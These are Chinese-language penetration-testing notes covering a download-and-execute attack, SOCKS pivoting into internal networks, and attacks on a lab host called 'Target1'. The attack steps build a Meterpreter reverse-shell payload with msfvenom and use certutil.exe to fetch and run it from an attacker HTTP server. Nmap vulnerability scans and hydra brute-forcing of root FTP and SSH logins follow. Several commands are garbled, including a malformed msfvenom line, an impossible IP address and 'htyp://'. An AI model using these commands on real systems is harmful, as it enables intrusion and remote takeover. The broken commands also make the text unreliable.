poweshell是最稳定的一个工具
点击文件名,
certuil.exe 是作为证书服务的一部分安装的命令行程序,我们可以使用此工具在,目标计算机中执行恶意的exe文件以获得meterpreter会话。
msfvenom -p windows/meterpreter/reverse_tcp|host=路径|port=1234 -f exe > shell.exe
python -m SimpleHTTPServer 8000
certutil.exe -urlcache -split -f http://192.168.1.2727:8000/shell.exe shell.exe & shell.exe
certutil.exe -urlcache -split -f htyp://192.168.1.227:8000/shell.exe shell.exe delete
内网渗透漫游之Socks代理
Socks代理简介
socks是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。
根据OSI模型,socks是会话层的协议,位于表示层与传输层之间。
使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层网关服务。
被代理端与代理服务器通过socks4/5代理协议进行通讯;
socks4是对HTTP代理协议的加强,它不仅代理HTTP协议,而是对所有向外的连接进行代理,没有协议限制;
socks5对前一版本做了进一步扩展,增加了支持UDP代理和身份验证功能,采用地址解析方案以支持域名和IPv6地址解析。
使用socks代理:
socks服务器的IP地址
socks服务所在端口
socks服务是否需要身份验证
什么是Socks
现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如Internet有效地隔离开来。
这些防火墙系统通常以应用层网关的形式在网络之间,提供受控的TELNET、FTP、SMTP等的接入。
而socks则提供一个通用框架来使这些协议安全透明地穿过防火墙。
socks代理工具介绍
EW是一套便携式的网络穿透工具,具有socks v5服务架构和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
proxyChains工具
测试Target1-信息收集
nmap -A -T4 -p- --script vuln 192.168.1.195
开放端口:21/22/80/111/3306/8888
测试Target1-分析利用
21/22端口:弱口令爆破
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh
3306端口:不允许远程IP连接
8888端口:宝塔登录页面